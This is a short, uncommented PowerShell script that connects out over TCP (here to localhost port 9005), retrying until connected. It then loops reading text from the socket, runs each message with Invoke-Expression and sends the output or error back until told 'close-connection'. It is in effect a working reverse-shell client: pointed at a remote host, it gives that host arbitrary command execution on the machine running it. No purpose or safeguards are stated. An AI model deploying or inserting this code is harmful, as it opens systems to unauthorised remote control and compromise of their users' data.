﻿$ServerName = 'localhost' 
$Port       = 9005 
  
$SourcePort = Get-Random -Minimum 48086 -Maximum 53042
$Endpoint   = New-Object System.Net.IPEndpoint ([ipaddress]::any,$SourcePort) 
$TcpClient  = [Net.Sockets.TCPClient]$Endpoint

Start-Sleep -Seconds 5

do {
    try {
        $TcpClient.Connect($ServerName,$Port)            
    } 
    catch {            
        Start-Sleep -Seconds 1            
    }
} while ($TcpClient.Connected -eq $false)
$TcpStream = $TcpClient.GetStream()

$loop = $true
$Message = ''
do {        
    if ($TcpStream.DataAvailable) {
        [byte[]]$byte = New-Object byte[] 64512
        $byteCount = $TcpStream.read($byte, 0, $byte.Length)
        $Message = [text.encoding]::ASCII.GetString( (1..$byteCount | ForEach-Object { $byte[$_-1] } ) )
                        
        $error.Clear()
        try {                                    
            $Result = Invoke-Expression -Command $Message -ErrorAction SilentlyContinue

            if ($Result -eq $null) { 
                $Result = 'success' 
            } else {
                $Result = ($Result | out-string) -join "`r`n"
            }

            if ($Message -eq 'close-connection') {
                $loop = $false
            } else {
                $ResultLines = (($Result | Out-String) -split "`r`n")
                $Data = [text.Encoding]::Ascii.GetBytes($Result)
                $TcpStream.Write($Data,0,$Data.length)
            }
        }
        catch {
            $Fehler = $error[0].Exception.Message            
            $Data = [text.Encoding]::Ascii.GetBytes($Fehler)
            $TcpStream.Write($Data,0,$Data.length)
        }            
    } else {            
        Start-Sleep -Milliseconds 200
    }
} while ($Message -eq '' -or $loop -eq $true)

Start-Sleep -Milliseconds 200

$TcpStream.Flush()
$TcpStream.Close()
$TcpClient.Close()
$TcpClient.Dispose()